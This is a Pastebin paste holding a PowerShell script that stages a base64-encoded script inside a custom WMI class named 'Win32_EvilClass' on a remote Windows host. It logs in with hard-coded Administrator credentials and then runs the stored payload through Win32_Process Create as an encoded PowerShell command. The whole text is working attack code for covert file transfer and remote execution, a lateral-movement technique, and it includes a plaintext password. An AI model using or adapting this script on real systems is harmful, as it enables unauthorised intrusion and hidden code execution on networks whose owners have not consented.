Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Run from 10.1.0.2 to transfer a file to 10.1.0.1.
- $localpath = 'C:\Users\Administrator\Documents\runme.ps1'
- #$bytes = [IO.File]::ReadAllBytes($localpath)
- $bytes = Get-Content $localpath -Raw
- $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($bytes))
- $opts = New-Object Management.ConnectionOptions
- $opts.Username = 'Administrator'
- $opts.Password = 'qwe123QWE!@#'
- $opts.EnablePrivileges = $true
- $conn = New-Object Management.ManagementScope
- $conn.Path = '\\10.1.0.1\root\default'
- $conn.Options = $opts
- $conn.Connect()
- $evilclass = New-Object Management.ManagementClass($conn, [String]::Empty, $null)
- $evilclass['__CLASS'] = 'Win32_EvilClass'
- $evilclass.Properties.Add('EvilProperty', [Management.CimType]::String, $False)
- $evilClass.Properties['EvilProperty'].Value = $encoded
- $evilclass.Put()
- $creds = Get-Credential '10.1.0.1\Administrator'
- $args = @{
- Credential = $creds
- ComputerName = '10.1.0.1'
- }
- $payload = @'
- $encodedFile = ([WmiClass]'root\default:Win32_EvilClass').Properties['EvilProperty'].Value
- Invoke-Command -ScriptBlock {powershell -NoProfile -EncodedCommand $encodedFile}
- '@
- $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
- $power = "powershell -NoProfile -EncodedCommand $encodedPayload"
- Invoke-WmiMethod @args -Class Win32_Process -Name Create -ArgumentList $power
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
